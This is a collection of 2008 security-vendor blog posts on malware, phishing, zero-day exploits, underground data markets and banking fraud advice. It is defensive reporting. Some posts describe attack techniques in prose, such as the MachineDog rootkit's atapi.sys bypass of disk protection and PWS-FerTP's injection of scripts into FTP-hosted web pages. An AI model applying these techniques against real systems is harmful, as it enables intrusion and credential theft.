3. Disable NULL sessions. Look up how to do it online.

One of the issues that we’ve been highlighting at our recent conference presentations and blogs was the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor , Ichitaro, last Friday.

This Japanese application have been known to be under the targeted attacks for several years and a few 0-day vulnerabilities were discovered and exploited in the past. Other than Ichitaro, other popular and localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities, even months after they have already been patched by the vendor.

Users should continue to stay vigilant of any suspicious email attachments, and do not open unknown files. Please be sure to update your applications, whether it is popular or not, with the latest security patches to protect you and your organization from the known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledge the vulnerability and will be posting a patch.

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. After using those vulnerabilities, relatively recent phones running S40, 3rd edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

• gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
• running a malicious MIDlet when the phone is first turned on
• accessing files
• sending SMS/MMS
• making phone calls
• reading your contacts
• accessing the SIM card
• eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesbe,r which cause just premium rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof of concept(PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

OMG, undetectable Trojans are coming to get us! At least that’s what a story in The Register says, referring to Limbo 2.

Or else we’ve just found further evidence of the “AV software is for catching unknown threats” myth.

Malware authors selling “guaranteed undetected” Trojans is not news; it’s been happening since developing Trojans was first motivated by money. The Trojan authors test their creations against freely available AV scanners, and if it’s undetected at that moment, it qualifies as “undetected.” However, that doesn’t mean that they will always remain detected. Or that another type of security product won’t detect it, such as a firewall or network intrusion prevention system.

One amusing example of malware for sale included an end-user license agreement that promised violators would be reported to AV companies so your botnet could be dismantled.

But I digress.

The point is that “undetectable Trojans” implies that some novel method of storing the malware code on the system is being employed, such that security software (and likewise the operating system) is incapable of seeing it. Limbo 2 does no such thing. It’s a simple PWS-Banker Trojan as far as security software is concerned. I find it disappointing that a security company would describe it otherwise–that smacks of FUD to me.

In other news, this will be my last post for the Avert Labs blog. As of next week, I’ll be the Director of Research for West Coast Labs. Thank you all for reading and commenting on my posts throughout the years. Hearing your opinions has been the most entertaining part of being a blogger!

Recently, a piece of malware named MachineDog attracted attention within the China security community. The malware itself appears to be a well designed tiny rootkit, and is quite different from other malware. One special characteristic of this malware is that it’s designed to penetrate the hard disk as well as security software, which are installed in most internet bars and cafes. This means it can infect most machines in many internet bars and cafes, in some cases without too much resistance.

The malware is composed of a user-mode application part and a kernel driver part. The application part does limited work, which includes extracting the driver and installing it as service, then communicating with the driver by io control. The earlier version of the application part does the infection work by sending IRPs into lower disk driver device(\Device\Harddisk\DR0) to locate and write userinit.exe onto the hard disk directly. In later versions, the infection works are improved and moved into the driver itself, leaving the application part tiny and simple.

The driver does the most important work. It does the infection which was implemented earlier in the application part. Its infection method is quite special and interesting, which can bypass and penetrate many hard disk protection software, and some security software. First it reads the atapi.sys driver file  from the hard disk then searches dispatch routine addresses in that driver’s body, to bypass any existing dispatch routine that have inline hooks. Why choose atapi.sys? Because the device created in atapi.sys is the last device in all the device stacks that the IRP passes through, and it’s the end of this IRP. Sending IRPs to this device can avoid all filter devices and inline hooks in any upper device which are used by some security software or protection software. Then the malware sends IRPs to the partition device dispatch routines in atatpi driver to read and write data directly into hard disk. It first reads data to locate which sector userinit.exe is resident in so it knows where to infect. It then writes the inject codes into the hard disk by that way and will att that point modify userinit.exe. At last it will remove inline hook of atapi devices if they’ve been inline hooked until it receives the close command from application part.

Most internet bars and cafes rely on hard disk protection software excessively, and mistakenly believe these types of software can replace security software. Once their machines are infected, the administrator just restores from backups made by the protection software. This malware takes advantage of this contrived neglect. The attack is so dangerous that once it successfully loads its driver into the kernel, most hard disk protection software will be nothing but an empty shuck, with the administrator still having no idea!!!

McAfee customers are protected from the threat by DAT 5337.

Reference:

http://article.pchome.net/content-515951.html

http://tech.ccidnet.com/art/1099/20080709/1501723_1.html

http://www.xj.xinhuanet.com/2008-06/20/content_13599327.htm

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’:

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants experiences, go here
and make sure you download the ‘Global Spam Diaries’ as well.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

A few days ago I was browsing a forum while I read a message from someone saying that he received a strange link from one of his MSN contact list, which was formed like the following:

http://[MSN_login].flatl1n[removed].info

This domain hosts a webpage asking for MSN logins and passwords and pointing to another webpage asking for ICQ login credentials:

But let’s examine this page in details, especially the “Terms of Use” for example:

“Terms of Use / Privacy Policy:

By filling out this form, you authorize TST Management, Inc to spread the word about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.”

Oh well, that reminds me how social engineering is powerful…
The victim received this URL from who is supposed to be one of his MSN contact and it is unlikely he will spend a few minutes reading those lines. So I agree, everything that the attackers do is published inside the Privacy Policy, but I disagree when they say that they don’t “trick” people to get their login credentials: they use social engineering attacks to get users’ passwords, this is dishonest and this is phishing scam!!

Now, here is the funny part of the “Terms of Use”:

“This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

TST Management, Inc reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.”

So ironic…
And the last part, the one that aroused my curiosity:

“You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, TST Management, Inc is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

Copyright 2008 TST Management, Inc”

I was wondering if this website was effectively hosted in republic of Panama, but a whois of the domain informed me that the IP address is located in Hong Kong actually:

The Reverse IP field says there are 32 other sites hosted on this server (210.56.53.224).
And we can see also that “TST Management, Inc” (who is the registrant of the domain), owns 412 other domains.
So I decided to do a Google search and I wasn’t surprise to notice that they are apparently used to phishing scams!
“TST Management, Inc” seems to be another name for the “Blue China Group Ltd”, the one that was sued by MySpace last year for mass spamming.

I managed to create a screenshot of the old “Mass Comment Poster” website that belonged to them:

We can see that the Terms of use were very cynical too!!

They also host what they introduce as a MySpace tracker (called “Stalker Tracker”) which is in fact another phishing scam website:

Besides the website displays another “typical” Privacy Policy mentioning:

We may temporarily access your MySpace account to do a combination
of the following:
1. Post bulletins to your friends promoting stalkertrack.com.
2. Post comments to your friends promoting stalkertrack.com.
3. Post a blog about our upcoming tracker for your friends to read.
4. Customize your blog header html with a clickable stalkertrack.com ad image.
5. Send a batch of blog invites on your behalf.
6. Send IM invites with a personalized stalkertrack.com message and/or image advertisement attached - to your friends and potential friends and other members.
7. Introduce new entertaining sites to your friends via comments, bulletins, and messages

And guess how can they do that? Once again, just by using the login credentials entered in the form…

Last but not least, once the login credentials are submitted via the phishing scam MSN/ICQ web pages, a PHP script is called to increment an online counter, and here are the statistics available at the moment:

This counter seems to supervise the activity on all their phishing websites, not only on a couple of them.

We can see that 92 people were reaching one of their phishing scam websites when I was looking at the statistics, they were 35334 unique visitors yesterday, 284746 visitors since the beginning of June, 3616516 visitors last month, and 7031582 visitors since this counter has been created (since February/March 2008 according to the second screenshot).

Be vigilant of such IM messages and websites marked as “copyright” to “Blue China Group, Ltd” or “TST Management, Inc“. Whatever the website purports to be they are certainly requesting your login credentials in an unclear way!!

Yesterday, when analyzing a variant of a FakeAlert trojan, I saw something funny, a confirmation that when analyzing malware it is rather common to stumble across interesting stuff

So, we received a file named 4nlSkgZm.exe, which of course is a really dodgy filename, but we’ll pretend we didn’t notice . When I tried to run this file on my goat machine, it of course started installing itself and displaying the usual “you are infected” popups, but it also decided to be even more clear in telling me I was infected:

What happened? Well, nothing too fancy: the malware replaced my existing background with a dropped image, and then set my current screensaver to “blackster.scr” that was dropped too. It is interesting to note that the “blackster.scr” is a legitimate screensaver, and we are sure that the original author would never even imagine that his funny creation could be used like this!

All in all a rather effective method of scaring the victims of this threat

I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan the last two days. It was encouraging to see many members from not only academics, security vendors, and anti-phishing groups but also many law enforcement agencies including Interpol, Kyoto Prefacture Police amongst others. There were also several presentators from the Online Gaming community.

Having such a diverse turn-out certainly helps push the greater awareness of a multinude of cyber crime issues. It was very encouraging to see everyone are agreeing on better co-operation in shutting down rogue sites, tracking the bad guys and protecting the users. There was also the video crew from NHK, to bring the CeCOS message across to Japanese TV viewers.

Dr. Uchida-san from The Institute of Information Security and Steve Sheng from Carnegie Mellon University (CMU) also presented a different angle of the issue, from the psychological and educational aspects. Both of which compliment the policy and technology countermeasures.

Shinsuke Honjo and I gave a presentation on Monday to highlight on how malware authors are now going all out to attack on victims from all cultures. They can craft spam, phishing sites or malware to target diverse cultures and groups of Internet users in the Asia Pacific region. It was interesting for us to have our research corroborated with data from other speakers at the event. Terence Park, researcher from KrCERT/CC, in particularly demonstrated how a Korean document viewer was used as a bait, to install a password stealer. This was another classic example of how malware authors, can be using different localized techniques to get their victims.

Overall, the message that seems to be very consistent throughout are - co-operation and education. In tackling a global issue like cyber crime, these are both important factors not only in tracking and prosecuting the criminals, but also in better protecting Internet businesses and users.

It’ll come as no surprise that there are a bunch of domain registrars that are effectively supporting criminal gangs by not acting on reports of domains run for evil deeds and criminal activities. (Or as we say: They don’t wear a glowing white hat!)

I was chatting on email with Garth Bruen from KnujOn the other day and we agreed that it’s been well known for a long time in the industry that certain registrars are “black hat” and he questioned what was being done about it and pointed me at a story they had worked with the Washington Post on the subject of their top ten documented here: http://www.knujon.com/registrars/#the_list.

For a different data source (and one that looks very much like our own ) URIBL’s “hall of shame” has been on line for ages and can be viewed here: http://rss.uribl.com/nic/

I don’t take these things at face value but I’ve been aware of this issue for a couple of years and have even stood up at an APWG conference and shook my finger at registries and registrars in the room after an early presentation on double-flux and made sure they knew only they could help fight it.

Well it looks like Garths article and PR worked, the wheels of power at ICANN have turned and they have told the worst registrars to act!

So my hat tip for the month of May has to go to Garth, Cool.. Nice one… and congratulations!

ICANN state

“But if those registrars, including those publicly cited, do not investigate and correct alleged inaccuracies reported to ICANN, our escalation procedure can ultimately result in ICANN terminating their accreditation and preventing them from registering domain names,”

I suspect however that the “inaccuracies” relate to the accuracy of whois information and if that is the case I suspect that the registrars will simply start their own privacy services.

NB: Privacy and anonymity are different things if your a LEA (Law Enforcement Authority) within your jurisdiction, but to me the humble lower middle-class sysadmin (Hi @SRS) and those outside of their primary jurisdiction they are effectively the same impenetrable barrier. We repute against domains registered with privacy services because statistically speaking (in the filtering metric truck-loads of email world) they are used as anonymity services more than privacy.

Competition time: Just for fun, I’m going to open a book on the first registrar to expire date and put a black McAfee Baseball Cap up for grabs. (We engineers don’t get much SWAG, let alone give it away). Just leave a message with the registrar you think will stop trading (or be disaccredited by ICANN) first and the date you think they will be gone on.

^{Employees of McAfee, KnujOn and ICANN need not apply, I’m the judge and my decision is final!}

Final thoughts: All we need now is a few of the heavily abused cc-TLD’s to do the same and dive into the fight before we see more of these.

This week’s news brings another report about arrests of people involved with Crimeware. This story is particularly notable due to the large number of individuals being charged, and because it’s been jointly announced by U.S. and Romanian authorities. Many people involved with gathering information on and prosecuting online criminals have complained about the lack of cooperation from certain countries, but this certainly shows that progress is being made in that arena.

One thing I thought was especially interesting in the report was the description of the process that was allegedly being used by the people involved:

According to the indictment, the Romania-based members of the enterprise obtained thousands of credit and debit card accounts and related personal information by phishing, with more than 1.3 million spam emails sent in one phishing attack. Once directed to a bogus site, victims were then prompted at those sites to enter access device and personal information. The Romanian “suppliers” collected the victims’ information and sent the data to U.S.-based “cashiers” via Internet chat messages. The domestic cashiers used hardware called encoders to record the fraudulently obtained information onto the magnetic strips on the back of credit and debit cards, and similar cards such as hotel keys. Cashiers then directed “runners” to test the fraudulent cards by checking balances or withdrawing small amounts of money at ATMs. The cards that were successfully tested, known as “cashable” cards, were used to withdraw money from ATMs or point-of-sale terminals that the cashiers had determined permitted the highest withdrawal limits. A portion of the proceeds was then wired to the supplier who had provided the access-device information.

This strikes me as a wonderful illustration of the resources that are now being put into the process by criminals. This isn’t a simple operation with some lone kid in his basement; this involves a network of people gathering information and testing, and relatively expensive card-writer hardware.

The media frequently speaks about the underground economy and quote price ranges for various private goods available for sale. I recently read the trends were bearish, but let there be no misunderstanding about that, if the quality is here, the price will still be high. It is just like the price of food, you have the hard-discount and the luxury stores!!

With this post, I wish to be more precise regarding the data regarding the prices of some cybercriminal groups around the globe.

Last Friday morning in France, my investigations lead me to visit a site proposing top-quality data for a higher price than usual. But when we look at this data we understand that as everywhere, you have to pay for quality. The first offer concerned bank logons. As you can see in the following screenshot, pricing depends on available balance, bank organization and country. Additional information such as PIN and Transfer Passphrase are also given when necessary:

For such prices, the seller offers some guaranties. For example, the purchase is covered by replacement, if you are unable - within the 24 hours - to log into the account using the provided details.

The selling site also proposes US, Austria and Spanish credit cards with full information:

• ccnumber
• cvv2
• exp.date
• name
• adress
• city
• state/province
• zip/postal
• phone-number
• SSN(US Only)
• DL#
• MMN

It is also possible to purchase skimmers (for ATM machine) and “dump tracks” to create fake credit cards. Here too, cost is in touch with the quality:

Depending on the price, you can choose your bank among various lists; more than 900 choices for North America or European countries:

Many other offers are available like shop administrative area accesses (back end of an online store where all the customer details are stored – from Name, SSN, DOB, Address, Phone number to CC) or UK or Swiss Passport information:

And to convince prospective clients, the site offers some free data to demonstrate their know-how. I partially anonymized some of this data so I could provide an example. If you recognize yourself, do not hesitate to contact the police force so that they may institute legal proceedings.

We have been in contact with one of the German’s Crime Investigating Authorities (LKA). This is a case when a malicious program running on mobile phones was making unauthorised calls. All these calls were connecting to one and the same SMS number which is used to top-up the amount of virtual money for one of the online games. A scheme to top-up in-game cash via SMS messages is frequently used by online game vendors.

This is a really interesting twist because in the past malware writers simply programmed malware (either on a desktop or on a mobile device) to call a premium phone number (one where the cost of a call is high). Of course, with this old method it is easier to trace the destination of funds because for each such call real money is transferred from a phone company to the owner of the premium number. So the principle “follow the money” to track the perpetrators usually works.

This new and indirect way of laundering money through an online game makes it significantly more difficult to track the destination - several in-game assets’ transfers can be made before the money is taken out of the game through real-money trading (RMT - it is a bannable offence in most online games but some games allow that - for example, Second Life).

Our advice is not to use programs for mobile phones that come from untrusted sources (like game forums, Internet newsgroups, Emails, P2P networks, blogs, etc.)

Avertlabs would kindly ask all mobile phone users to be vigilant and submit suspicious programs for our analysis - the easiest way is to use our online Webimmune service www.webimmune.net.

A recent report by the OECD (Organisation for Economic Co-operation and Development) indicated that counterfeit and pirated goods in 2005 could have had a value of up to 200 billion U.S. dollars.

One path to fake goods is via spam, which frequently offers counterfeit medicines and replica watches. A recent post from the French CERT-LEXSI blog caught my attention regarding fake luxury mobile phones selling for absolutely unbeatable prices.

These phones are normally manufactured by Vertu, a British subsidiary of Nokia, and are sold in luxury shops in Monte Carlo, Cannes, or Beverly Hills. On their official top-quality site (www.vertu.com), prices are not mentioned, but by visiting some authorised retailer Web sites I found exorbitant figures. Some mobiles, bedecked in gold and diamonds, exceed $90,000. Really too expensive for me!

Using Google, it’s really easy to find fake sites offering these counterfeit marvels. In fact it is easier to find the fake sites than the authorized ones!

And the prices–assuming you need one of these–are attractive: less than $1,000 for a copy of an original that sells for $97,300.

Regular spam campaigns promote such Vertu “replica” sites. Be vigilant, however, because appearances can be deceiving. Sites are numerous and their common feature is their high-quality, professional look–with black backgrounds that imitate the official site.

These sites are hosted at various providers in various countries (USA, Germany, and Hong Kong). Some of them seem clean; others are known for bulletproof hosting services and their relationship with the Russian Business Network, an alleged cybercrime organization. The registrars are also diverse (Estonia, Russia, and Korea) but more questionable. It is surprising that these do not require any name verification before accepting registrations. But once you know that a lot of spam and malware-related Web sites come from them, their permissiveness is easier to understand. Registrant addresses and e-mails give us an inkling regarding the nationality of their owners: China and Russia.

For the potential buyer, the key issue concerns the risk. The Swiss Watch Industry clearly points out that the buyer is the first victim, because purchasing counterfeits is:

• Agreeing that piracy is OK; the counterfeiter seeks to appropriate somebody else’s hard work and investment.
• Supporting and financing organized crime; links between counterfeiting activities and criminal networks have been established in many cases.
• Accepting underground and child labor.
• Endangering your own health and safety; the risk is real with medicines, aircraft and auto spare parts, medical supplies, and cosmetics.
• Reducing employment and stifling growth; this form of criminality contributes to the reduction of employment, which is estimated to cost more than 200,000 jobs worldwide per year.
• Being liable to criminal sanctions; the buyer may face criminal and financial sanctions. The mere possession of counterfeits is illegal in many countries. Furthermore, penalties could be claimed by legitimate intellectual property rights’ owners. Customs also can seize and destroy illegal items and assess fines.

And if these considerations don’t stop you, remember you run the risk of not receiving the goods you pay for; instead you might have your banking details stolen and reused in future malevolent activities. None of the sites I visited yesterday offered a secure Internet payment system; one of them housed a hidden Iframe linked to a known password-stealing Trojan.

There’s been considerable stink lately about the Race to Zero contest that is to be held at Defcon. I, for one, am a bit perplexed by this. This article from ZDNet Australia is what finally made my eyes cross in confusion/aggravation.

I don’t know at what point the collective “wisdom” became that signature-based AV was ever intended to be about defending against every threat ever devised, before it was ever devised. Signature-based scanners are intended to detect and clean known threats. If you modify a known threat, it’s not really “known” anymore, is it? Now it’s a variant of a known threat.

It’s certainly desirable to have protection against all threats, known and not-yet-known. This is what things like firewalls, Intrusion Prevention Systems, Data Leakage Prevention and all those other wonderful security products are intended to do, in concert with AV. Most AV software now also includes proactive static detection like Generic and Heuristic detection, along with more dynamic detection like emulation or behavioral detection. Many AV programs now also include broader security functionality like a firewall or IPS.

Generic and Heuristic detection is certainly better at picking up unknown threats than simple signature-based scanning, but there are three things that limit it. For one, it’s still reactive, basing detection on known bad techniques. Secondly, it’s static - obfuscation can still muck up the detection, if it causes the file to deviate from the known bad technique. Finally, there’s still a need for these detections not to be false-prone. Heuristics and generics essentially cover known “really, really bad” techniques. The threshold of badness must be quite high to make it into AV products. Consider how many commercial products and widely used administration tools blur those lines, and you may come to appreciate what a very fine line it is.

It’s not clear from what I’ve seen whether the contest’s judges intend to use the most paranoid settings available within the various products, but their description does seem to indicate they’ll only use the static detection, rather than running it real-time through the products. This does not accomplish a full testing of the products capability, it only tests one component. The results they get will not be what an average user will get.

The contest organizers and participants are playing with fire in order to prove what we already know: Signature-based scanners are meant to protect against known threats. That doesn’t mean that AV is dead, or that it’s useless. The industry is evolving, and its products with it. AV is intended to be one tool in a complete security arsenal. Defense in depth is where it’s at, if you’re really looking to protect your network.

There have been a couple of threads lately, one on LifeHacker, one on Ask Metafilter, about whether it’s necessary to use anti-virus software. The comments in both are a very clear indication on how far we have to go in educating users on the real danger of malware. It would appear the average user is operating under assumptions that might have been true 8 years ago. Now, it’s just a recipe for disaster.

The erroneous assumptions are that:

1) Viruses are noisy/easily visible and
2) Viruses are caused by actively bad behavior

To quote What the Geek from the LifeHacker thread,

I have a business client whose website was giving people a trojan for a while because it got hacked - and guess what? if you didn’t have an AV running, you’d never know that it happened. It would just sit on your computer sending your data off to who knows where silently. Just because it doesn’t give you a big skull and crossbones on the screen doesn’t mean it isn’t there.

This really sums up the situation for me - an innocent user was hacked, and might never have known it, as it was silent. It’s like the difference between the demos we give of an “average scary virus” now versus the ones we gave 10 years ago. Back then, the demos were all skulls and message-boxes and file corruption and deletion. Very spooky, very visual and very loud. Now the scary demos are effectively silent. The malware can come in without any user interaction, and you’d never know it was there without specific tools to show you what changes it’s making behind-the-scenes. Off goes your credit card number and your private documents, without you being the wiser.

And this is not something that just happens in the “bad parts” of the internet. Think of the most innocuous content on the internet. Pictures of cute and fluffy animals would certainly qualify, right? At the end of last year, CuteOverload fell victim to a hacking that delivered trojans to its unsuspecting readers. And major sites are supposed to be safe, right? How about the Superbowl website hack from the beginning of last year?

One point that I think needs bringing up specifically is the question of whether to use “on-access” scanning, or if “on-demand” is enough. As Dwroth succinctly put it in the LifeHacker thread:

All time (active protection) = good for the public, but overkill for the geek.

Turning off on-access scanning has never been a great idea, but now it could be a catastrophically bad idea. We’ve already discussed how one’s level of geekiness does not figure into one’s susceptibility to viruses which don’t require human interaction. Personally, if there’s a virus trying to get onto my computer, I’d really rather find out immediately before any changes could be made to my system rather than some time tomorrow or later this week.

A few minutes is plenty of time for malware to transmit my most sensitive data, why give it hours?

Clear protocols such as FTP or SMTP are unsafe. Anyone on the subnet can easily collect login usernames and passwords just by sniffing the network traffic. Even switched networks can be easily attacked to redirect traffic and gather credentials as simply as on a HUB based network. However, FTP is still widely used and often the only protocol provided by hosting providers and it’s for this reason we weren’t so surprised to come across PWS-FerTP – a piece of malware that takes advantage of this situation, collecting FTP credentials and infecting FTP repositories.

To slow down analysis, PWS-FerTP includes some (very simple) anti-debugging tricks and VMWare detection functionality shown below. Not very stealthy though, utilizing some well known VMWare internal mechanisms used mainly by VMware tools to communicate with the host system.

PWS-FerTP bypasses the Windows Firewall (by modifying the registry) and starts to look for three widely used client applications providing FTP support (FAR Manager, CuteFTP and Total Commander). Indeed, these applications unfortunately use weak encryption to save FTP passwords, while other details such as logins and IP addresses are stored in the clear.

In an attempt to gather more FTP credentials, PWS-FerTP switches the first network adapter found on the system to promiscuous mode via the ioctlsocket API call, allowing for a disabling of MAC filtering and thus sniffing all FTP account details passing by the current subnet.

PWS-FerTP sends all gathered credentials within specially crafted HTTP requests to a remote web server.

But PWS-FerTP is more than a password stealer – a quick string search reveals some interesting blocks of obfuscated Javascript as well:

Once decoded, the aim of this script becomes much clearer, redirecting user’s browser via an IFRAME HTML tag pointing to a malicious website.

In fact, PWS-FerTP connects to each previously gathered FTP account and looks for files whose names belong to this list:
- index.htm
- main.htm
- default.htm
- index.php
- main.php
- default.php

When such a file is found, PWS-FerTP retrieves it locally, injects the Javascript code shown above, and put the file back to the FTP repository.

Another good reason to follow well-known best practices: avoid using clear-text protocols and use applications providing strong encryption, like keepass, to store your credentials.

A few days ago here at Avert Labs we have received yet another interesting malicious file related to the now not-so-famous Tibetan situation. At the beginning it looked like a simple Flash movie, at least judging from the icon.

Executing the file, called RaceForTibet.exe, shows a cartoon with a very skilled Chinese gymnast performing some amazingly convoluted exercise on a “vaulting Bbox” for which the jury immediately scored her a shocking 0! Whilst the gymnast’s performance is “re-wound,” a number of fairly stark photographs of real events, taking place throughout China and Tibet, are shown as a flashback.

As a malware researcher I just could not keep myself from looking further into the file to see if it was anything more than some political movie about events taking place in Tibet and China, especially after several recent posts [1] [2] discussing the Fribet Trojan.

Here are some screenshots of the cartoon that runs using “mini flash-player 2.6”:

For the next step I decided to use our “Rootkit Detective” to check for hidden processes and hooks, and turns out a number of files were silently dropped on my PC!

So here comes the “Pro-Tibetan Movement rootkit”:

As you can see a number of files are now on my system and completely hidden from “user-land”. The original file (RaceforTibet.exe) initially drops a file called “dopydwi.sys” in the %windir%/system32/ drivers folder.

Here is an interesting part of this hidden system driver shown in IDA:

We can now start to see the bigger picture here! The rootkit is actually a keylogger posing as a political message; in fact you can notice above the call to the function “GetKeyboardState“.

Also below we can see the file is creating a device called “ServiceDll”, which will be used to load the driver:

And here we can see the patching of the SSDT, hooking a large number of Windows API functions by changing their address.

The DLL file dropped on the system is going to be used to do the actual keylogging and it’s loaded through the device shown on the first IDA screenshot above.

To complete the picture, a hidden log file kept on the system (dopydwi.log) stores all the information gathered on the compromised machine.

Here is the output of a log file I captured:

[2008-04-10 07:14:53] Ethereal: Save file as [C:\Program Files\Ethereal\ethereal.exe] tibetan-capture
[2008-04-10 09:37:08] Save Image [C:\Program Files\GIMP-2.0\bin\gimp-2.2.exe] sdt-bigj
[2008-04-10 09:45:22] Mozilla Firefox Start Page - Mozilla Firefox [C:\Program Files\Mozilla Firefox\firefox.exe]
www.avertlabs.com
logtest.txt
[2008-04-10 09:46:24] Google - Windows Internet Explorer [C:\Program Files\Internet Explorer\iexplore.exe]
testing search engine

The remote IP where this data is sent to is located in China (humorously enough).

So just when much trouble is taking place, we can also continue to see an increase in attacks carried out by people taking advantage of the media hype and interest raised across the globe over these dramatic circumstances.

Will you watch the Olympic games? Best not if they claim to appear via e-mail as a Flash executable movie!

A recent article in The Register seems to imply that if you’ve got out-of-date security software, any fraudulent charges to your accounts could suddenly be your liability. The advice given by the British Bankers’ Association includes much more than just the state of one’s security software; this could just as easily include misaddressing a check or falling victim to a phishing attack, among other things. On the other hand, it’s highly unlikely it would ever be worth the bank’s effort to invoke this clause.

From the Banking Code of the British Bankers’ Association

12.11 If you act fraudulently, you will be responsible for all losses on your account. If you act without reasonable care, and this causes losses, you may be responsible for them. (This may apply, for example, if you do not follow Section 12.5 or 12.9 or you do not keep to your account’s terms and conditions.)

These two sections offer quite a few bullet points about how not to be a victim of identity theft or financial fraud.

12.5
• Do not keep your checkbook and cards together.
• Do not let anyone else use your card, and do not tell anyone else your PIN, password, or other security information.
• Your bank or building society will never ask you for your PIN. If you are in any doubt about whether a caller is genuine or if you are suspicious, take the caller’s details and call us.
• If you change your PIN, you should choose your new PIN carefully.
• Try to remember your PIN, password, and other security information, and securely destroy the notice as soon as you receive it.
• Never write down or record your PIN, password, or other security information.
• Always take reasonable steps to keep your card safe and your PIN, password, and other security information secret at all times.
• If your card issuer takes part in a secure online payment system (such as Verified by Visa or MasterCard SecureCode), consider signing up either at their Web site or whenever you are given the option while shopping online. This involves your registering a password with your card company; you will be asked for the password whenever you shop at an online retailer taking part in the scheme. You should keep this password secret.
• Never give your account details or other security information to anyone unless you know who they are and why they need them.
• Keep your card receipts and other information about your account containing personal details (for example, statements) safe and get rid of them carefully.
• Take care when storing or getting rid of information about your accounts. People who commit fraud use many methods, such as “bin raiding” (a.k.a., dumpster diving) to get this type of information. You should take simple steps such as shredding printed material.
• Be aware that your mail is valuable information in the wrong hands. If you don’t receive a bank statement, card statement, or any other expected financial information, contact us.
• You will find the APACS Web site a helpful guide on what to do if you suspect card fraud.

12.9
• Keep your PC secure. Use up-to-date anti-virus and spyware software and a personal firewall.
• Keep your passwords and PINs secret.
• We (or the police) will never contact you to ask you for your online banking or payment card PINs, or your password information.
• Treat e-mails you receive from senders claiming to be from your bank or building society with caution and be wary of e-mails or calls asking you for any personal security details.
• Always access Internet banking sites by typing the bank or building society’s address into your Web browser. Never go to an Internet banking site from a link in an e-mail and then enter personal details.
